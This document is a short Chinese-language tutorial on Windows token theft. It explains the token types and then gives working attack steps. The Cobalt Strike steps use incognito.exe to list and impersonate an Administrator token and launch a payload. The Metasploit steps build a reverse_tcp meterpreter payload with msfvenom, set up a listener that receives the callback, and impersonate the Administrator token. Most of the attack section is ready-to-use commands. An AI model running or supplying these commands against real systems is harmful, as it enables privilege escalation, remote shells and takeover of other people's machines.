Windows令牌窃取攻击

Windows令牌窃取攻击
- 一、Windows令牌
- 二、令牌窃取攻击
  - 1、通过CS进行令牌攻击
  - 2、通过msf进行令牌攻击

一、Windows令牌

令牌（Token）是系统的临时密钥，相当于账户名和密码，用来决定是否允许这次请求和判断这次请求是属于哪一个用户的，它允许你在不提供密码或其他凭证的前提下，访问网络和系统资源，这些令牌持续存在系统中，除非系统重新启动。

Windows令牌种类：
（1）访问令牌（Access Token）表示访问控制操作主题的系统对象
（2）会话令牌（Session Token）是交互会话中唯一的身份标识符
（3）保密令牌（Security Token）又叫认证令牌或硬件令牌，是一种计算机身份校验的物理设备

Windows访问令牌又分为：
（1）授权令牌（Delegation Token），也叫主令牌，支持交互式会话登录（例如本地用户登录、远程桌面登录）
（2）模拟令牌（Impresonation Token）支持非交互的会话（例如使用 net use访问共享文件夹）

二、令牌窃取攻击

前提：拿到的用户是过了UAC的管理员

1、通过CS进行令牌攻击

（1）通过CS控制了一个过了UAC的管理员

（2）列出用户的令牌

shell incognito.exe list_tokens -u

（3）使用窃取的令牌进行上线

shell incognito.exe execute -c "XB\Administrator" C:\Users\test\Desktop\win10-3\can.exe

2、通过msf进行令牌攻击

（1）通过msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.133 lport=4567 -f exe -o payload.exe

（2）进入msfconsole进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.142.133
set lport 4567
run

（3）加载incognito，进行令牌攻击

load incognito   		                #加载incognito
list_tokens -u    		                #列举令牌
impersonate_token "XB\Administrator" 	#令牌攻击
rev2self 或 drop_token                  #返回之前token